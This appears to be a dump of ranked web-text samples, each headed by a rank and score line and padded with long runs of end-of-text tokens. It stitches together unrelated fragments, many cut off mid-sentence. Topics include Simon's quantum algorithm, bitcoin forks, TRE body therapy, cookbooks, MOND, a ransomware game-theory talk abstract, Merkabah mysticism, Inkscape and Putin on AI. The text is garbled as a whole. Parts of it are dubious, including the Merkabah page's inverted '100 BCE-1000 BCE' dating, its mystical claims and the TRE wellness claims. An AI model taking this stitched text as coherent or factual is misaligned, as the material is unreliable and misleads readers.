quantum computers are just regular computers that are much harder to build. + +One of the best-known pieces of quantum software is Shor’s algorithm, which factorises large numbers into their prime components – a notoriously slow and difficult problem to solve classically. Shor’s algorithm has been run in a limited way using photons sent through the air and on silicon chips – but a full-blown quantum computer capable of running it could threaten online encryption, which relies on large primes. + +Designing an algorithm that takes advantage of a quantum computer is tricky, so there aren’t many around. In 1994, Daniel Simon, then at the University of Montreal, Canada, came up with one of the earliest examples. Crucially, his was the first that showed a quantum computer could solve a problem exponentially faster than an ordinary computer. Previous algorithms had only shown a slight speed boost, or none at all. + +Advertisement + +Sceptical + +Simon was a quantum computing sceptic, but in attempting to prove they would never be useful, he stumbled across a problem that showed the exact opposite. Imagine you feed a string of bits, like 0101, into a black box and get another string, like 1100, out in return. There are a finite number of possible outputs, but you don’t know how the black box produces them. Simon’s problem asks: does the black box give a unique output for every possible input, or do some inputs give a common output? The problem doesn’t show up in any real-world applications, but Simon’s algorithm for solving it inspired the more useful Shor’s algorithm and the field of quantum computing as a whole. + +“It has a kind of special place in the history of the development of quantum algorithms,” says Mark Tame at the University of KwaZulu-Natal in Durban, South Africa. “However, despite being the first to show that an exponential gap exists, it was surprisingly never experimentally realised in all the years since.” + +That’s why Tame and his colleagues have now run Simon’s algorithm for the first +================================================================================ +Rank = 78; Score = 3407872.0 +<|begin_of_text|>For a broader coverage of forks, see Fork (blockchain) + +Bitcoin forks are defined variantly as changes in the protocol of the bitcoin network or as the situations that occur "when two or more blocks have the same block height".[1] A fork influences the validity of the rules. Forks are typically conducted in order to add new features to a blockchain, to reverse the effects of hacking or catastrophic bugs. Forks require consensus to be resolved or else a permanent split emerges. + +Forks of the client software + +The following are forks of the software client for the bitcoin network: + +All three software clients attempt to increase transaction capacity of the network. None achieved a majority of the hash power.[2] + +Intended hard forks splitting the cryptocurrency + +Hard forks splitting bitcoin (aka "split coins") are created via changes of the blockchain rules and sharing a transaction history with bitcoin up to a certain time and date. The first hard fork splitting bitcoin happened on 1 August 2017, resulting in the creation of Bitcoin Cash. + +The following is a list of hard forks splitting bitcoin by date and/or block: + +Bitcoin Cash: Forked at block 478558, 1 August 2017, for each bitcoin (BTC), an owner got 1 Bitcoin Cash (BCH) + +Bitcoin Gold: Forked at block 491407, 24 October 2017, for each BTC, an owner got 1 Bitcoin Gold (BTG) + +Bitcoin SV: Forked at block 556766, 15 November 2018, for each Bitcoin Cash (BCH), an owner got 1 Bitcoin SV (BSV). + +Intended soft forks splitting from not-most-work block + +The fork fixing the value overflow incident was controversial because it was announced after the exploit was mined. + +Unintended hard forks + +Two hard forks were created by "protocol change" definition: + +March 2013 Chain Fork (migration from BerkeleyDB to LevelDB caused a chain split) [3] + +CVE-2018-17144 (Bitcoin 0.15 allowed double spending certain inputs in the same block. Not exploited)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 79; Score = 3407872.0 +<|begin_of_text|>Our next workshops will be in Auckland 23rd to 25th September 2016. It will be run by Leilani Smiler and Mariano Perdroza. Please visit our workshops page for more information. + +this link to David Berceli’s website for an excellent summary of how TRE has helped others. Followto David Berceli’s website for an excellent summary of how TRE has helped others. + +CTV interview with Dr Berceli in Christchurch: + +Click on the link to see an interview with Dr Berceli at workshops held in Christchurch (Dec 2011). + +Below is a 6 minute overview of TRE from a documentary shown on South African Medical TV. + +What is TRE? + +TRE® is a purely body based, physical process. There is no counseling, or ‘talk therapy’ aspect to it. + +TRE® (Tension & Trauma Release Exercises) is series of 7 exercises that assist the body in releasing deep muscular patterns of tension. Created by Dr. David Berceli, PhD, TRE® safely activates a natural reflex mechanism of shaking or vibrating that releases muscular tension, calming down the nervous system. + +TRE®’s reflexive muscle vibrations generally feel pleasant and soothing. After doing TRE®, many people report feelings of peace and well-being. + +An explanation of TRE by Dr David Berceli + +TRE NZ is a Franchise of TRE for All, a Not for Profit Organisation, based in the USA and founded by Dr David Berceli, PhD. All Providers of TRE listed on this website have completed the Certification Process designed and delivered through TRE for All. + +This technology is not intended to diagnose, treat, cure, or prevent any disease. + +Medical advice must only be obtained from a physician or qualified health practitioner. + +Results may vary between individuals. + +There are no guarantees, expressed, or implied.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 80; Score = 3325952.0 +<|begin_of_text|>Best Wild Game Cookbooks – Venison, Turkey, Moose, Elk, Fish, and other Wild Game Cookbooks + +Cooking wild game after a successful hunt is not always the easiest thing to master. The most common mistake is simply treating wild game like we would beef, chicken, or pork, which are so prevalent in our diets. Wild game needs special care, but when you take a little time to learn how to prepare, the rewards are well worth it. + +Wild Game Cookbooks + +Buck, Buck, Moose: Recipes and Techniques for Cooking Deer, Elk, Moose, Antelope and Other Antlered Things + +This is not your father’s venison cookbook. Buck, Buck, Moose is the first comprehensive, lushly photographed, full-color guide to working with and cooking all forms of venison, including deer, elk, moose, antelope and caribou. Buck, Buck, Moose will take you around the world, from nose to tail. The book features more than 100 recipes ranging from traditional dishes from six continents to original recipes never before seen. You’ll also get thorough instructions on how to butcher, age and store your venison, as well as how to use virtually every part of the animal. Buck, Buck, Moose also includes a lengthy section on curing venison and sausage-making. Peppered throughout are stories of the hunt and essays on why venison holds such a special place in human society. Venison is far more than mere food. It is, in many ways, what made us human. + +The Complete Guide to Hunting, Butchering, and Cooking Wild Game: Volume 1: Big Game + +This invaluable book includes + +• recommendations on what equipment you will need—and what you can do without—from clothing to cutlery to camping gear to weapons + +• basic and advanced hunting strategies, including spot-and-stalk hunting, ambush hunting, still hunting, drive hunting, and backpack hunting + +• how to effectively use decoys and calling for big game + +• how to find hunting locations, on both public and private land, and how to locate areas that other hunters aren’t using + +• how and when to scout hunting locations for maximum effectiveness + +• basic information on procuring hunting tags, including limited-entry “draw” tags + +• a species-by-species description of fourteen big-game animals, from their mating rituals and preferred habitats to the best hunting techniques—both firearm and archery—for each species + +• how to plan and pack for backcountry hunts + +• instructions on how to break +================================================================================ +Rank = 81; Score = 3309568.0 +<|begin_of_text|>The speed of sound is the distance travelled per unit time by a sound wave as it propagates through an elastic medium. At 20 °C (68 °F), the speed of sound in air is about 343 meters per second (1,234.8 km/h; 1,125 ft/s; 767 mph; 667 kn), or a kilometre in 2.9 s or a mile in 4.7 s. It depends strongly on temperature, but also varies by several meters per second, depending on which gases exist in the medium through which a soundwave is propagating. + +The speed of sound in an ideal gas depends only on its temperature and composition. The speed has a weak dependence on frequency and pressure in ordinary air, deviating slightly from ideal behavior. + +In common everyday speech, speed of sound refers to the speed of sound waves in air. However, the speed of sound varies from substance to substance: sound travels most slowly in gases; it travels faster in liquids; and faster still in solids. For example, (as noted above), sound travels at 343 m/s in air; it travels at 1,480 m/s in water (4.3 times as fast as in air); and at 5,120 m/s in iron (about 15 times as fast as in air). In an exceptionally stiff material such as diamond, sound travels at 12,000 metres per second (27,000 mph);[1] (about 35 times as fast as in air) which is around the maximum speed that sound will travel under normal conditions. + +Sound waves in solids are composed of compression waves (just as in gases and liquids), and a different type of sound wave called a shear wave, which occurs only in solids. Shear waves in solids usually travel at different speeds, as exhibited in seismology. The speed of compression waves in solids is determined by the medium's compressibility, shear modulus and density. The speed of shear waves is determined only by the solid material's shear modulus and density. + +In fluid dynamics, the speed of sound in a fluid medium (gas or liquid) is used as a relative measure for the speed of an object moving through the medium. The ratio of the speed of an object to the speed of sound in the fluid is called the object's Mach number. Objects moving at speeds greater than Mach1 are said to be traveling at supersonic speeds. + +History [ edit ] + +Sir Isaac Newton computed the speed of sound in air as 979 feet per second +================================================================================ +Rank = 82; Score = 3309568.0 +<|begin_of_text|>The November/December issue of acmqueue is out now + +Subscribers and ACM Professional members login here + +PDF + +May 11, 2012 + +Volume 10, issue 5 + +Modeling People and Places with Internet Photo Collections + +Understanding the world from the sea of online photos + +David Crandall, School of Informatics and Computing, Indiana University + +Noah Snavely, Department of Computer Science, Cornell University + +Computational photography often considers sets of photos taken by a single user in a single setting, but the popularity of online social media sites has created a social aspect to photo collections as well. Photo-sharing sites such as Flickr and Facebook contain vast amounts of latent information about our world and human behavior. Our recent work has involved building automatic algorithms that analyze large collections of imagery in order to understand and model people and places at a global scale. Geotagged photographs can be used to identify the most photographed places on Earth, as well as to infer the names and visual representations of these places. At a local scale, we can build detailed three-dimensional models of a scene by combining information from thousands of two-dimensional photographs taken by different people and from different vantage points. One key representation for many of these tasks is a network: a graph linking photos by visual similarity or other measures. + +This article describes our work in using online photo collections to reconstruct information about the world and its inhabitants at both global and local scales. This work has been driven by the dramatic growth of social content-sharing Web sites, which have created immense online collections of user-generated visual data. Flickr.com alone currently hosts more than 6 billion images taken by more than 40 million unique users,11 while Facebook.com has said it grows by nearly 250 million photos every day.20 + +While users of these sites are primarily motivated by a desire to share photos with family and friends, collectively they are generating vast repositories of online information about the world and its people. Each of these photos is a visual observation of what a small part of the world looked like at a particular point in time and space. It is also a record of where a particular person (the photographer) was at a moment in time and what he or she was paying attention to. + +In aggregate, and in combination with nonvisual metadata available on photo-sharing sites (including photo timestamps, geotags, captions, user profiles, and social contacts), these billions of photos present a rich source of information about the state of the world and the behavior of its people. We can thus imagine extending the +================================================================================ +Rank = 83; Score = 3293184.0 +<|begin_of_text|>"MOND" redirects here. For other uses, see Mond + +Modified Newtonian dynamics (MOND) is a theory that proposes a modification of Newton's laws to account for observed properties of galaxies. It is an alternative to the theory of dark matter in terms of explaining why galaxies do not appear to obey the currently understood laws of physics. + +Created in 1982 and first published in 1983 by Israeli physicist Mordehai Milgrom,[1] the theory's original motivation was to explain that the velocities of stars in galaxies were observed to be larger than expected based on Newtonian mechanics. Milgrom noted that this discrepancy could be resolved if the gravitational force experienced by a star in the outer regions of a galaxy was proportional to the square of its centripetal acceleration (as opposed to the centripetal acceleration itself, as in Newton's second law), or alternatively if gravitational force came to vary inversely with radius (as opposed to the inverse square of the radius, as in Newton's law of gravity). In MOND, violation of Newton's laws occurs at extremely small accelerations, characteristic of galaxies yet far below anything typically encountered in the Solar System or on Earth. + +Unsolved problem in physics: + +What is the nature of dark matter? Is it a particle, or do the phenomena attributed to dark matter actually require a modification of the laws of gravity? (more unsolved problems in physics) + +MOND is an example of a class of theories known as modified gravity, and is an alternative to the hypothesis that the dynamics of galaxies are determined by massive, invisible dark matter halos. Since Milgrom's original proposal, MOND has successfully predicted a variety of galactic phenomena that are difficult to understand from a dark matter perspective.[2][3] However, MOND and its generalisations do not adequately account for observed properties of galaxy clusters, and no satisfactory cosmological model has been constructed from the theory. + +The accurate measurement of the speed of gravitational waves compared to the speed of light in 2017 ruled out many theories which used modified gravity to explain dark matter.[4] However, both Milgrom’s bi-metric formulation of MOND and nonlocal MOND are not ruled out according to the same study. + +Overview [ edit ] + +[5] Comparison of the observed and expected rotation curves of the typical spiral galaxy M33 + +Several independent observations point to the fact that the visible mass in galaxies and galaxy clusters is insufficient to account for their dynamics, when analysed using Newton's laws. This discrepancy – known as +================================================================================ +Rank = 84; Score = 3276800.0 +<|begin_of_text|>What do the San Francisco Giants, Cryptolocker and nuclear war all have in common? They all involve conflicts in which incentives, payouts and winning strategies can be analyzed with game theory. Game theory is a branch of mathematics that models conflict and cooperation between parties and is used in many real-world decision making scenarios, inside and outside the Information Security field. Game theory is particularly useful in analyzing the extortionist / victim dynamic present in ransomware infection scenarios. + +Ransomware comes in many varieties and works in different ways, but the basic setting is the same: cybercriminals infect a computer with malicious software that blocks access to the system or important files until the ransom is paid. + +The conventional wisdom in information security regarding ransomware is to never pay. But, why? The answer is a little more nuanced than “never pay” or “always pay.” The decision is a complex scenario of incentives and payoffs. Who stands to gain when ransomware is paid? Who gains when it is not paid? + +This talk will use the familiar topic of ransomware to introduce participants to game theory concepts like rational decision-making, zero-sum games, incentives, utility and Nash Equilibrium – all important tools that can help solve security problems. By analyzing ransomware decision-making with a game theory mindset, participants will learn a new set of skills and a new way of incentive-driven thinking.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 85; Score = 3260416.0 +<|begin_of_text|>I have a well-referenced book in my library at work, Wayne Eckerson's "Performance Dashboards." Although it is now about five years old – and aging, given how quickly the business intelligence industry is advancing – I continue to use it and discover new ideas. + +If you've got his book, check out chapter 6. It classifies three types of performance dashboards: Operational, Tactical, and Strategic. + +In a nutshell, Wayne defines Operational Dashboards as being focused on exception alerting, based on real-time or transactional data. It's up to the user or a script to then act upon this opportunity or issue. OK, I'm with him so far. + +Tactical Dashboards display data that is not quite as real-time as operational dashboards, and are generally not evaluated against absolute conditions. Contextual information, and the ability to explore the data, tends to guide users to the decision process. + +Strategic Dashboards, according to Wayne, track performance metrics against high-level objectives. As a result, these dashboards tend to summarize performance over the past month, quarter, or year. Strategic objectives are usually also the result of many underlying metrics, and require social analysis to digest properly. + +At Klipfolio, we tend to use the terms operational and tactical interchangeably. If, instead of using the naming conventions, we simply arrange these dashboards on a time continuum - real-time, daily, and monthly - this aligns better with what's actually happening. (For the sake of definition, let's ignore how frequently the data gets refreshed, because after all, each of these dashboards can accept real-time data.) + +The business dashboard is likely to be quite volatile, its data changing frequently throughout the day, but it can be fully trusted to present an accurate snapshot of what is happening right now. This is your "speedometer." It's also one of the most easily understood dashboards, applicable to a wide range of employees for various tasks. The logic for this type of a dashboard is simple. But don't mistake simple and easy for less value. Would you want to drive without your speedometer? + +The daily dashboard settles down considerably. We're now looking at an aggregated, summarized, or averaged view of data. Because this presentation tends to smooth the outliers, we can start comparing it against historical values, benchmarks, and goals without having a panic attack every time the data refreshes. This would be your "average trip fuel consumption" metric. The daily dashboard allows you to make informed decisions. Because it's +================================================================================ +Rank = 86; Score = 3260416.0 +<|begin_of_text|>Merkabah + +Merkabah, also spelled Merkaba, is the divine light vehicle allegedly used by ascended masters to connect with and reach those in tune with the higher realms. "Mer" means Light. "Ka" means Spirit. "Ba" means Body. Mer-Ka-Ba means the spirit/body surrounded by counter-rotating fields of light, (wheels within wheels), spirals of energy as in DNA, which transports spirit/body from one dimension to another. + +Merkabah Mysticism Chariot of the Gods + +The word Merkaba or Merkava - Hebrew 'Chariot' or 'to ride an animal, in a chariot' - is used in the Bible (Ezekiel 1:4-26) to refer to the throne-chariot of God, the four-wheeled vehicle driven by four Cherubim, each of which has four wings and four faces (of a man, lion, ox, and eagle). Merkabah/Merkavah Mysticism (or Chariot mysticism) is a school of early Jewish mysticism, c. 100 BCE-1000 BCE, centered on visions such as those found in the Book of Ezekiel chapter 1, or in the hekhalot ("palaces") literature, concerning stories of ascents to the heavenly palaces and the Throne of God. The main corpus of the Merkabah literature was composed in Israel in the period 200-700 CE, although later references to the Chariot tradition can also be found in the literature of the Chassidei Ashkenaz in the Middle Ages. A major text in this tradition is the Maaseh Merkabah (Works of the Chariot). In Ancient Alien Theory the Chariot is a UFO. + +Archaeologists describe how Ezekiel's Wheel helped turn African Americans into Christians PhysOrg - November 9, 2016 + +At the site of a plantation where abolitionist Frederick Douglass once lived archaeologists have uncovered striking evidence of how African and Christian religious beliefs blended and merged in the 19th century. The team dug up an intact set of objects that they interpret as religious symbols - traditional ones from Africa, but mixed with what they believe to be a Biblical image: a representation of Ezekiel's Wheel. + +In medieval Judaism, the beginning of the book of Ezekiel was regarded as the most mystical passage in the Bible, and its study was discouraged, except by mature individuals with an extensive grounding in the +================================================================================ +Rank = 87; Score = 3260416.0 +<|begin_of_text|>Warren Berger believes questions are more important than answers. A best-selling author and self-proclaimed “questionologist,” Warren is on a mission to help all leaders learn how to use questioning to support innovative, resilient and adaptive organizations. + +We caught up with Warren recently to ask him about why it’s more important than ever to lean into questioning and curiosity. + +Lisa Kay Solomon: Your recent book is called A More Beautiful Question. Can you talk about what a “beautiful question” is and why they are so important to ask? + +Warren Berger: I am particularly interested in questions that lead to innovation. So, I studied a lot of those kinds of questions to see what they had in common and arrived at this definition: A beautiful question is an ambitious yet actionable question that can shift the way we think about something and may serve as a catalyst for change. + +Each aspect is important. “Ambitious” because we have to ask bold questions to innovate. “Actionable” because big questions we can’t do anything about don’t lead to change. Critically, the question has to cause a mental shift—it makes you step back and say, “Hmmm, that’s interesting. I hadn’t really thought about this question before, and I want to explore it further.” + +These kinds of questions are the starting point of innovation and growth, which is why every leader should be asking them and encouraging others to ask them. + +LKS: How does questioning help us become better innovators? + +WB: Questioning helps us become more comfortable and proactive in dealing with the unknown, which is critical for innovators. Innovators often operate in a realm where the solution to a particular problem is unknown or may even seem impossible. + +The innovator’s job is to explore that unknown and arrive at a completely new and original answer. Questions can help the innovator keep moving forward; you start with one question, then that can lead you to a better, deeper question, and so on. You could almost think of questioning as “an app for the unknown.” + +When you finally arrive at the answer—the innovation—it may seem the questioning is over. But it isn’t really. Soon, the innovator is wondering how to make their creation even better, more affordable—how they can expand upon it. + +For true innovators, the cycle of questioning never ends. + +LKS: Are you seeing technology change the type of questions we should be asking? + +WB: Technology has thrown everything open to question because everything we thought we knew how to do can now be done differently. The shoe-ret +================================================================================ +Rank = 88; Score = 3211264.0 +<|begin_of_text|>For any business to grow, it is crucial to keep records accurately. These records are always useful when planning for future operations. They also are used to find out how the company has been performing, especially when it comes to profitability. Therefore, records are not among the things that you can take lightly. If you cannot keep them on your own, it would be good to find the services of a bookkeeping company. This gives you the assurance that as you focus on the other important aspects that can grow your business, your records will be properly kept, and you can access them anytime you want. When looking for such a company, you have to be careful with the choices that you make. Smart organization managers do not just hire any company that they come across. They always look at the following factors before making any choice. + +Modern bookkeeping practices + +How will your records be stored? The best Bookkeeping Company in Melbourne, VIC has invested in modern record storage techniques. Instead of the old files, they prefer to turn your documents into soft copies that can be stored more securely. This means that they can store them in the cloud, and the chances of losing any of your records will be minimal. In addition to that, they ensure that everything is securely stored so that none of your information is accessed by third parties. Remember that some of the documents may crucial to your operations, and leaking them can be costly. + +Experience in bookkeeping + +Finding bookkeepers that have a lot of experience is one of the things that can guarantee better services. It is because, over the years, those that have been handling a lot of records are known to offer better services. It seems that they get better with every task that they are assigned because there are unique skills that they acquire. This is the reason they know all the challenges that organization go through when it comes to managing records. They also have perfect solutions to these problems. + +Accessibility + +You should be thinking of how fast you will get any of your records whenever you need them. If you have an emergency and you have to produce a specific document, you will not have the luxury of having to wait for too long for the company to provide it. For instance, if auditors demanded some proof of transactions, you should have a reliable company that can retrieve it from their systems at once. Unfortunately, this is not what you will find from all the companies out there and therefore, you have to be careful with the bookkeepers that you hire. + +If there is no reliable bookkeeper that you know of, you may want +================================================================================ +Rank = 89; Score = 3178496.0 +<|begin_of_text|>Inkscape just released version 0.91 of their Open Source vector graphics editor, and the new package will soon be available in the stable repositories for Fedora 21. Inkscape 0.91 is the first major release of Inkscape for a few years, and it has many bugfixes and new features compared to the previous Inkscape 0.48 release. + +For those not familiar with Inkscape, It is a versatile, feature rich vector graphics editor that can be used for a wide range of tasks, including UI mockups, icons, logos, digital illustration: + +Inkscape uses the Scalable Vector Graphics (SVG) format as the primary source filetype, which is getting more and more popular as a format for vector graphics on the web. Inkscape can also export to a wide range of different formats, including PNG and PDF. + +Inkscape 0.91 is a huge improvement over the previous 0.48 release, with the inkscape developers fixing hundreds of bugs, introducing a wide range of new tools and features, and also making Inkscape perform much, much better. + +Stability and Performance + +The Inkscape developers did a lot of work in this release to improve the performance and stability of Inkscape. I have been using development versions of Inkscape 0.91 for over a year now, and noticed a huge reduction in the number of times Inkscape stalled or crashed during use. + +Additionally, Inkscape 0.91 includes a new renderer based on Cairo, which is noticeably faster at rendering complex drawings with lots of SVG filters like blurs, and also caches parts of complex drawings to improve rendering times when editing. + +Inkscape now uses threading when rendering filter effects, so users with newer machines with multiple processing cores will notice a difference when rendering complex images. Inkscape also now uses up to 25% less memory on some complex drawings. + +New Features + +Inkscape 0.91 delivers a wide range of features that improve and simplify drawing and illustrating in Inkscape. + +New measurement tool + +0.91 introduces a new tool that allows users to measure the distances and angles between objects in an inkscape drawing by drawing a “ruler” over the objects. Using this tool is super simple, just draw a live over your objects, and the distances and angles will live-update on canvas as you move your mouse + +Font and Text Improvements + +The inkscape developers did a lot of work in the 0. +================================================================================ +Rank = 90; Score = 3162112.0 +<|begin_of_text|>This article is Part VI in a series looking at data science and machine learning by walking through a Kaggle competition. If you have not done so already, you are strongly encouraged to go back and read the earlier parts – (Part I, Part II, Part III, Part IV and Part V). + +Continuing on the walkthrough, in this part we build the model that will predict the first booking destination country for each user based on the dataset created in the earlier parts. + +Choosing an Algorithm + +The first step to building a model is to decide what type of algorithm to use. Below we look at some of the options. + +Decision Tree + +Arguably the most well known algorithm, and one of the simplest conceptually. The decision tree works in a similar manner to the decision tree that you might create when trying to understand which decision to make based on a range of variables. + +The goal of the decision tree algorithm used for classification problems (like the one we are looking at) is to create one of these decision trees to classify records into a set number of categories. To do this, it starts with all the records in the training dataset and looks through all the features until it finds the one that allows it to most ‘cleanly’ split the records according to their categories. For example, if you are using daily weather data to try and determine whether it will rain the following day (i.e. there are two categories, ‘it does rain’ and ‘it does not rain’), the algorithm will look for a feature that best splits the records (in this case representing days) into those two categories. When it finds that feature, and the value to split on, it creates one point (‘decision node’) on the decision tree. It then takes each subpopulation and does the same thing again, building up a tree until either all the records are correctly classified, or the number in each subpopulation becomes too small to split. Below is an example decision tree using the described weather data to predict if it will rain tomorrow or not (thanks to Graham Williams’ excellent Rattle package for R): + +The way to interpret the above tree is to start at the top. The first criteria the algorithm splits on is the humidity at 3pm. Starting with 100% of the records, if the the humidity at 3pm is less than 71, as it is the case for 93% of the records, we move to the left and find the next decision node. If the humidity at 3pm is greater than or equal to +================================================================================ +Rank = 91; Score = 3145728.0 +<|begin_of_text|>Russian president Vladimir Putin has joined the war of words concerning the international race to develop artificial intelligence. Speaking to students last Friday, Putin predicted that whichever country leads the way in AI research will come to dominate global affairs. + +“Artificial intelligence is the future, not only for Russia, but for all humankind,” said Putin, reports RT. “It comes with colossal opportunities, but also threats that are difficult to predict. Whoever becomes the leader in this sphere will become the ruler of the world.” + +“It comes with colossal opportunities, but also threats.” + +The development of artificial intelligence has increasingly become a national security concern in recent years. It is China and the US (not Russia) which are seen as the two frontrunners, with China recently announcing its ambition to become the global leader in AI research by 2030. Many analysts warn that America is in danger of falling behind, especially as the Trump administration prepares to cut funding for basic science and technology research. + +Although it’s thought that artificial intelligence will help boost countries’ economies in a number of areas, from heavy industry to medical research, AI technology will also be useful in warfare. Artificial intelligence can be used to develop cyber weapons, and control autonomous tools like drone swarms — fleets of low-cost quadcopters with a shared ‘brain’ that can be used for surveillance as well as attacking opponents. + +Both China and the US are currently researching this technology, and in his speech on Friday, Putin predicted that future wars would be fought by countries using drones. “When one party's drones are destroyed by drones of another, it will have no other choice but to surrender,” said the Russian president, according 